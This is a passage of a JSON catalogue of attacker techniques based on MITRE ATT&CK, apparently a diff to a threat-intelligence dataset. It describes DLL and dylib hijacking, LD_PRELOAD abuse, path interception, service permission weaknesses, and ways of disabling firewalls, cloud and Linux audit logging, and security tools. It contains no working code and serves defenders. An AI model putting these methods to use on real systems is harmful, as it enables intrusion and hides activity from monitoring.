"69cd62f8-b729-4a05-8351-5bb961f7c6d6", + "value": "DLL Search Order Hijacking" + }, + { + "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.[[FireEye DLL Side-Loading](https://app.tidalcyber.com/references/9d58bcbb-5b96-4e12-8ff2-e0b084c3eb8c)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "7851bfe7-f149-47f5-9970-66d7cc4fdbe6", + "value": "DLL Side-Loading" + }, + { + "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.[[Wardle Dylib Hijack Vulnerable Apps](https://app.tidalcyber.com/references/128b4e3f-bb58-45e0-b8d9-bff9fc3ec3df)][[Wardle Dylib Hijacking OSX 2015](https://app.tidalcyber.com/references/c78d8c94-4fe3-4aa9-b879-f0b0e9d2714b)][[Github EmpireProject HijackScanner](https://app.tidalcyber.com/references/c83e8833-9648-4178-b5be-6fa0af8f737f)][[Github EmpireProject CreateHijacker Dylib](https://app.tidalcyber.com/references/2908418d-54cf-4245-92c6-63f616b04e91)] Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.[[Writing Bad Malware for OSX](https://app.tidalcyber.com/references/5628ecd9-48da-4a50-94ba-4b70abe56089)][[wardle artofmalware volume1](https://app.tidalcyber.com/references/53d0279e-4f30-4bbe-a9c7-90e36cd81570)][[MalwareUnicorn macOS Dylib Injection MachO](https://app.tidalcyber.com/references/61aae3a4-317e-4117-a02a-27885709fb07)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "6c8fa277-33c3-45b5-8f0d-9b1c0ccaf284", + "value": "Dylib Hijacking" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.[[Man LD.SO](https://app.tidalcyber.com/references/a8a16cf6-0482-4e98-a39a-496491f985df)][[TLDP Shared Libraries](https://app.tidalcyber.com/references/2862845b-72b3-41d8-aafb-b36e90c6c30a)][[Apple Doco Archive Dynamic Libraries](https://app.tidalcyber.com/references/e3b8cc52-2096-418c-b291-1bc76022961d)] These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.[[Baeldung LD_PRELOAD](https://app.tidalcyber.com/references/6fd6ea96-1cf4-4169-8069-4f29dbc9f217)]\n\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.\n\nOn Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.[[Man LD.SO](https://app.tidalcyber.com/references/a8a16cf6-0482-4e98-a39a-496491f985df)][[TLDP Shared Libraries](https://app.tidalcyber.com/references/2862845b-72b3-41d8-aafb-b36e90c6c30a)] Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.[[Code Injection on Linux and macOS](https://app.tidalcyber.com/references/82d41fd8-495d-41b6-b908-6ada5764c94d)][[Uninformed Needle](https://app.tidalcyber.com/references/5ac2d917-756f-48d0-ab32-648b45a29083)] [[Phrack halfdead 1997](https://app.tidalcyber.com/references/9b3f0dc7-d830-43c5-8a5b-ad3c811920c5)][[Brown Exploiting Linkers](https://app.tidalcyber.com/references/24674e91-5cbf-4023-98ae-a9f0968ad99a)] \n\nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.[[TheEvilBit DYLD_INSERT_LIBRARIES](https://app.tidalcyber.com/references/bd27026c-81eb-480e-b092-f861472ac775)][[Timac DYLD_INSERT_LIBRARIES](https://app.tidalcyber.com/references/54fcbc49-f4e3-48a4-9d67-52ca08b322b2)][[Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass](https://app.tidalcyber.com/references/67f3ce33-0197-41ef-a9d0-474c97ecf570)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.006" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "b0d884c3-cf87-4610-992d-4ec54c667759", + "value": "Dynamic Linker Hijacking" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d). Several examples of this weakness in existing common installers have been reported to software vendors.[[mozilla_sec_adv_2012](https://app.tidalcyber.com/references/cd720550-a0b5-4d1d-85dd-98da97f45b62)] [[Executable Installers are Vulnerable](https://app.tidalcyber.com/references/5c2791d4-556d-426a-b305-44e23b50f013)] If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.005" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "1f6a471d-49c6-4150-b213-2422d5fd3f26", + "value": "Executable Installer File Permissions Weakness" + }, + { + "description": "Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)][[FinFisher exposed ](https://app.tidalcyber.com/references/b2f4541e-f981-4b25-abf4-1bec92b16faa)] The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.[[Windows Process Injection KernelCallbackTable](https://app.tidalcyber.com/references/01a3fc64-ff07-48f7-b0d9-5728012761c7)]\n\nAn adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://app.tidalcyber.com/technique/ef85800b-080d-4739-9f3b-91b61314a93e) or [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) into another process.\n\nA pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function).[[NtQueryInformationProcess](https://app.tidalcyber.com/references/7b533ca9-9075-408d-b125-89bc7446ec8f)] Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]\n\nThe tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload.[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)] Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.013" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "68ffdbed-08d8-46a2-a833-984bbf0d9b4a", + "value": "KernelCallbackTable" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c).[[ExpressVPN PATH env Windows 2021](https://app.tidalcyber.com/references/26096485-1dd6-512a-a2a1-27dbbfb6fde0)]\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or modifying the `/etc/paths.d` folder contents.[[uptycs Fake POC linux malware 2023](https://app.tidalcyber.com/references/edc18649-2fcf-5fb3-a717-db4bb28ca25f)][[nixCraft macOS PATH variables](https://app.tidalcyber.com/references/83daecf1-8708-56da-aaad-1e7e95c4ea43)][[Elastic Rules macOS launchctl 2022](https://app.tidalcyber.com/references/04b0582e-357f-5f2a-8582-b3bf8f52c2a2)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.007" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "0a4dd066-6a28-4dcb-ab3d-215fc01db9cb", + "value": "Path Interception by PATH Environment Variable" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6), the search order differs depending on the method that is used to execute the program. [[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)] [[Windows NT Command Shell](https://app.tidalcyber.com/references/aee1e76c-8ff2-4ff0-83e3-edcb76f34d19)] [[Microsoft WinExec](https://app.tidalcyber.com/references/9e1ae9ae-bafc-460a-891e-e75df01c96c4)] However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. [[Microsoft Environment Property](https://app.tidalcyber.com/references/64598969-864d-4bc7-805e-c289cccb7bc6)]\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.008" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "0df21d65-c885-415a-8f91-477ae1b37839", + "value": "Path Interception by Search Order Hijacking" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths [[Microsoft CurrentControlSet Services](https://app.tidalcyber.com/references/cb9b5391-773f-4b56-8c41-d4f548c7b835)] and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). [[Help eliminate unquoted path](https://app.tidalcyber.com/references/23ad5a8c-cbe1-4f40-8757-f1784a4003a1)] (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. [[Windows Unquoted Services](https://app.tidalcyber.com/references/30681a0a-a49f-416a-b5bc-621c60f1130a)] [[Windows Privilege Escalation Guide](https://app.tidalcyber.com/references/185154f2-5f2e-48bf-b609-991e9d6a037b)]\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.009" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "08188de6-22c8-42af-b01c-f1c250c22514", + "value": "Path Interception by Unquoted Path" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.010" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "bd569ff9-c038-48c0-83d0-f5c784b439bc", + "value": "Services File Permissions Weakness" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), or [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532). Access to Registry keys is controlled through access control lists and user permissions. [[Registry Key Security](https://app.tidalcyber.com/references/f8f12cbb-029c-48b1-87ce-624a7f98c8ab)][[malware_hides_service](https://app.tidalcyber.com/references/c5982f65-1782-452a-9667-a8732d31e89a)]\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.[[Kansa Service related collectors](https://app.tidalcyber.com/references/d854f84a-4d70-4ef4-9197-d8f5396feabb)][[Tweet Registry Perms Weakness](https://app.tidalcyber.com/references/7757776d-b0e9-4a99-8a55-2cd1b248c4a0)]\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.[[microsoft_services_registry_tree](https://app.tidalcyber.com/references/171cfdf1-d91c-4df3-831e-89b6237e3c8b)] If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.[[insecure_reg_perms](https://app.tidalcyber.com/references/d18717ae-7fe4-40f9-aff2-b35120d31dc8)]\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.[[microsoft_services_registry_tree](https://app.tidalcyber.com/references/171cfdf1-d91c-4df3-831e-89b6237e3c8b)][[troj_zegost](https://app.tidalcyber.com/references/c3790ad6-704a-4076-8729-61b5df9d7983)] Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.[[malware_hides_service](https://app.tidalcyber.com/references/c5982f65-1782-452a-9667-a8732d31e89a)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.011" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "bc996f67-7cb7-4ba4-9156-4f2f8283d66d", + "value": "Services Registry Permissions Weakness" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "110c385f-9f27-4fd6-837c-6261294073ab", + "type": "similar" + }, + { + "dest-uuid": "69cd62f8-b729-4a05-8351-5bb961f7c6d6", + "type": "similar" + }, + { + "dest-uuid": "7851bfe7-f149-47f5-9970-66d7cc4fdbe6", + "type": "similar" + }, + { + "dest-uuid": "6c8fa277-33c3-45b5-8f0d-9b1c0ccaf284", + "type": "similar" + }, + { + "dest-uuid": "b0d884c3-cf87-4610-992d-4ec54c667759", + "type": "similar" + }, + { + "dest-uuid": "1f6a471d-49c6-4150-b213-2422d5fd3f26", + "type": "similar" + }, + { + "dest-uuid": "68ffdbed-08d8-46a2-a833-984bbf0d9b4a", + "type": "similar" + }, + { + "dest-uuid": "0a4dd066-6a28-4dcb-ab3d-215fc01db9cb", + "type": "similar" + }, + { + "dest-uuid": "0df21d65-c885-415a-8f91-477ae1b37839", + "type": "similar" + }, + { + "dest-uuid": "08188de6-22c8-42af-b01c-f1c250c22514", + "type": "similar" + }, + { + "dest-uuid": "bd569ff9-c038-48c0-83d0-f5c784b439bc", + "type": "similar" + }, + { + "dest-uuid": "bc996f67-7cb7-4ba4-9156-4f2f8283d66d", + "type": "similar" + } + ], + "uuid": "1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68", + "value": "Hijack Execution Flow" + }, + { + "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://app.tidalcyber.com/technique/4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)][[Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022](https://app.tidalcyber.com/references/af755ba2-97c2-5152-ab00-2e24740f69f3)]\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.007" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "ccb72576-4e85-4c7b-89b8-fa67cc6cdbef", + "value": "Disable or Modify Cloud Firewall" + }, + { + "description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.\n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.[[Following the CloudTrail: Generating strong AWS security signals with Sumo Logic](https://app.tidalcyber.com/references/96560211-59b3-4eae-b8a3-2f988f6fdca3)] They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.[[AWS Update Trail](https://app.tidalcyber.com/references/a94e1e4a-2963-5563-a8a6-ab9f64a86476)][[Pacu Detection Disruption Module](https://app.tidalcyber.com/references/deba605b-7abc-5794-a820-448a395aab69)] In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.[[Dark Reading Microsoft 365 Attacks 2021](https://app.tidalcyber.com/references/f26d3aa4-6966-53c4-b9d1-848420377eae)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.008" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "6824cdb3-a4c5-45a8-a3d5-5a5afd347214", + "value": "Disable or Modify Cloud Logs" + }, + { + "description": "Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.\n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.[[Red Hat System Auditing](https://app.tidalcyber.com/references/599337b3-8587-5578-9be5-e6e4f0edd0ef)][[IzyKnows auditd threat detection 2022](https://app.tidalcyber.com/references/8a2f5c37-df28-587e-81b8-4bf7bb796854)]\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.[[Trustwave Honeypot SkidMap 2023](https://app.tidalcyber.com/references/300505ae-bb7a-503d-84c5-9ff021eb6f3a)][[ESET Ebury Feb 2014](https://app.tidalcyber.com/references/eb6d4f77-ac63-4cb8-8487-20f9e709334b)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.012" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "d9eb2887-840e-5ed7-bb4b-3b210f4147f9", + "value": "Disable or Modify Linux Audit System" + }, + { + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://app.tidalcyber.com/technique/36850d17-a7d5-41ac-aa89-040b9c0b2b3f)).[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.004" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8", + "value": "Disable or Modify System Firewall" + }, + { + "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.[[SCADAfence_ransomware](https://app.tidalcyber.com/references/24c80db5-37a7-46ee-b232-f3c3ffb10f0a)]\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator 